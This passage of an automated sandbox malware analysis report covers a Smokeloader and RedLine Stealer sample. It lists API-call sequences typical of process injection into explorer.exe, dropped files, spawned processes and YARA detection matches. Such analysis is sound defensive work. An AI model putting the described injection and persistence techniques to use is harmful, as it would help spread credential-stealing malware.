                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,wcsstr,tolower,towlower,5_2_004032C7
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_00403043 RtlCreateUserThread,NtTerminateProcess,9_2_00403043
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014C4
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_00401508 NtAllocateVirtualMemory,9_2_00401508
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004014CF NtAllocateVirtualMemory,9_2_004014CF
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015D5
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004014DE NtAllocateVirtualMemory,9_2_004014DE
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015DF
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015E6
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015F2
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004014F5 NtAllocateVirtualMemory,9_2_004014F5
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004014F8 NtAllocateVirtualMemory,9_2_004014F8
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_004014FB NtAllocateVirtualMemory,9_2_004014FB
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E04B92 RtlMoveMemory,NtUnmapViewOfSection,13_2_00E04B92
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E033C3 NtQueryInformationFile,13_2_00E033C3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E0349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,13_2_00E0349B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E0342B NtQueryObject,NtQueryObject,RtlMoveMemory,13_2_00E0342B
                Source: C:\Windows\explorer.exeCode function: 14_2_001D38B0 NtUnmapViewOfSection,14_2_001D38B0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B41016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,15_2_00B41016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B41819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,15_2_00B41819
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B41A80 NtCreateSection,NtMapViewOfSection,15_2_00B41A80
                Source: C:\Windows\explorer.exeCode function: 16_2_0011355C NtUnmapViewOfSection,16_2_0011355C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00A31016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,17_2_00A31016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00A31B26 NtCreateSection,NtMapViewOfSection,17_2_00A31B26
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00A318BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,17_2_00A318BF
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0043EC277_2_0043EC27
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00439CC07_2_00439CC0
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0043F1787_2_0043F178
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0043F6C97_2_0043F6C9
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00440B137_2_00440B13
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_0043EC279_2_0043EC27
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_00439CC09_2_00439CC0
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_0043F1789_2_0043F178
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_0043F6C99_2_0043F6C9
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_00440B139_2_00440B13
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_006AE1F49_2_006AE1F4
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB49AC810_2_00007FF6AAB49AC8
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4322010_2_00007FF6AAB43220
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4DC2010_2_00007FF6AAB4DC20
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4A78C10_2_00007FF6AAB4A78C
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4213C10_2_00007FF6AAB4213C
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4A53410_2_00007FF6AAB4A534
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4B43C10_2_00007FF6AAB4B43C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E0219813_2_00E02198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E0C2F913_2_00E0C2F9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E1B35C13_2_00E1B35C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E5443813_2_00E54438
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E1B97E13_2_00E1B97E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E06E6A13_2_00E06E6A
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E25F0813_2_00E25F08
                Source: C:\Windows\explorer.exeCode function: 14_2_001D1E2014_2_001D1E20
                Source: C:\Windows\explorer.exeCode function: 16_2_0011205416_2_00112054
                Source: C:\Windows\explorer.exeCode function: 16_2_0011286016_2_00112860
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BC8F.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
                Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00E08801 appears 38 times
                Source: veEGy9FijY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 38E5.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: uievsid.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@63/14@7/4
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_0277FE01 CreateToolhelp32Snapshot,Module32First,0_2_0277FE01
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB47138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,10_2_00007FF6AAB47138
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\haevsidJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\38E5.tmpJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: s6.s7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: aYX7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: VD[E7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: =KnH7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: &mm7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: R`7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: F:7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: 0.txt7_2_00431540
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCommand line argument: poC7_2_00436EC0
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: s6.s9_2_00431540
